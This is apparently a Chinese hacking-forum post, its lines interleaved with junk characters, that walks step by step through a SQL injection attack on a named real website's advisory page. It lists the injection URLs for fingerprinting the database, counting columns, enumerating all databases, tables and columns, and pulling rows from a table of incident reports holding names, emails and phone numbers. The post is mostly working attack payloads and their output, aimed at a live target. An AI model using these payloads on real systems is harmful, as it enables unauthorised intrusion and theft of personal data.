1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询4 d- Z4 `" g m0 b% b+ ^+ @
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解2 f, D6 S. y$ ^; T3 F6 w! v* d9 N
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--( X4 e( i% q% g' P- |! u
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--* Q* g+ A3 y: N4 t7 b
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
, t% I* C! S9 w* ~9 W4.判断有没有写权限( f; Q' J3 ] S3 ~3 U
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限) g7 K4 J5 T0 O8 X9 N/ q( o
没办法,手动猜表啦
, F8 \# e% M; z2 J$ J$ D# X5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
( _" C! y& N" c$ i但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
+ n8 p' s; Y& [8 j. j5 ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--* }; w _5 I: k3 _
成功查出所有数据库,国外的黑客就是不一般。数据库如下:: `( x$ _2 v& m, a: |; s
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb/ |9 V% A; G7 N2 N
6.爆表,爆的是twcert库
5 Q$ p# f) z$ E4 T0 Z/ @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--' V) I: A% n. V/ M" n4 m1 R
爆出如下表
- t& a$ r! p# |6 u/ ~3 x/ adownloadfile,irsys,newsdata,secrpt,secrpt_big5
$ G7 {0 ~6 s+ Q7.爆列名,这次爆的是irsys表
7 B$ E# r1 M0 W, _/ \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--2 t1 R( M3 Y+ u, F& g
爆出如下列6 {6 X. O& R! E
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status0 z; R M6 T5 t2 m
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
9 O" `& u7 U" F6 Ghttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--) i; I4 M3 F. ^* ]/ N. C9 p
返回是3,说明每个列里有3个地段
r' f1 t [8 a- {' e) j( ^: x8 n9.爆字段内容
3 [4 R6 W" B4 I3 Z4 V1 Ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
" O3 `' r# H" F7 W" v爆出name列的第一个字段的内容0 u. W1 l4 z/ L5 @1 t0 k' x' S
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
/ P* z% H+ o& U8 n; y" B爆出name列的第二个字段的内容 |